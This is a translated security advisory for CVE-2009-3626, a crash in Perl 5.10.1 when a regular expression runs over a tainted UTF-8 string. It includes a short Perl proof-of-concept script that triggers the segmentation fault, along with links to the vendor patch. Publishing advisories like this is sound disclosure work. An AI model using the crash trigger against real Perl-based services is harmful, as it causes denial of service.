Security Vulnerability
Perl UTF-8 Regular Expression Processing Denial of Service Vulnerability

Published: 2009-10-25
Updated: 2009-10-27

Affected systems:
Larry Wall Perl 5.10.1
Description:
BUGTRAQ  ID: 36812
CVE(CAN) ID: CVE-2009-3626

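Perl is a free and powerful programming language.

When a Perl process handles certain obfuscated spam messages, matching a string that contains UTF-8 characters against a particular regular expression triggers a segmentation fault, which crashes the interpreter.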

<*Source: Mark Martinec (Mark.Martinec@ijs.si)
  
  Links: http://secunia.com/advisories/37144/
         http://rt.perl.org/rt3/Ticket/Attachment/617489/295383/
*>

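Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!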

#!/usr/bin/perl -T
  use strict;

  # Here is a HTML snippet from a malicious/obfuscated mail message.
  # Note the last character has an invalid and huge UTF-8 code
  # (as a result of an unrelated bug in HTML::Parser).
  #
  my $t = '<a>Attention Home&#959&#969n&#1257rs...1&#1109t '.
          'T&#1110&#1084e E&#957&#1257&#1075075</a>';

  $t =~ s/&#(\d+)/chr($1)/ge;    # convert HTML entities to UTF8
  $t .= substr($ENV{PATH},0,0);  # make it tainted

  # show character codes in the resulting string
  print join(", ", map {ord} split(//,$t)), "\n";

  # The following regexp evaluation crashes perl 5.10.1 on FreeBSD.
  # Note that $t must be tainted and must have the UTF8 flag on,
  # otherwise the crash seems to be avoided.

  $t =~ /( |\b)(http:|www\.)/i;

Recommendation:
Vendor patch:

Larry Wall
----------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's site:

http://perl5.git.perl.org/perl.git/commitdiff/0abd0d78a73da1c4d13b1c700526b7e5d03b32d4

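This vulnerability advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.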